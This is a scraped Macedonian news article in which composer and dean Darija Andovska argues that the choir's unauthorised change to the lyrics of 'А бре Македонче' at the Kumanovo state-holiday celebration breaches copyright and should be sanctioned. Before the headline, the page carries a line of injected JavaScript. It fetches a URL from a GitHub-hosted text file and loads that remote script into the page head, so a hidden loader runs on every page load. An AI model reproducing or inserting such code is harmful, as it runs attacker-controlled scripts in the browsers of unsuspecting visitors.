;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Андовска: Промените во авторските дела без дозвола од авторот треба да бидат подложни на санкции - Антропол
АктуелноЛокалноСтав

Андовска: Промените во авторските дела без дозвола од авторот треба да бидат подложни на санкции

Македонската композиторка и пијанистка Дарија Андовска, која воедно е Декан на Факултетот за музичка уметност, на својот фејсбук профил даде свој коментар во однос на промената на текстот на песната ‘‘А бре Македонче‘‘ која на 11 Октомври беше изведена на централната прослава во Куманово по повод државниот празник, а стиховите “клетите фашисти‘‘ од страна на хорот беа заменети и испеан како ’’душмани клети‘‘.

Според професорката, ваквите измени на текст или композиција без претходна консултација со авторот на делото се недозволиви и истите, заради нарушување на авторски права треба да бидат правно санкционирани.

„Сите авторски песни и дела, вклучувајќи ја и ‘А бре Македонче’ (неофицијалната прва химна на Македонија) имаат автор на музика и автор на текст, кои понатаму ги делат авторските права соодветно. Текстот на песна (како и музиката), особено при официјална изведба на песната, не смее да трпи промени без дозвола од авторот односно наследниците на авторските права. Останатото е, и треба да биде подложно на правни санкции‘‘.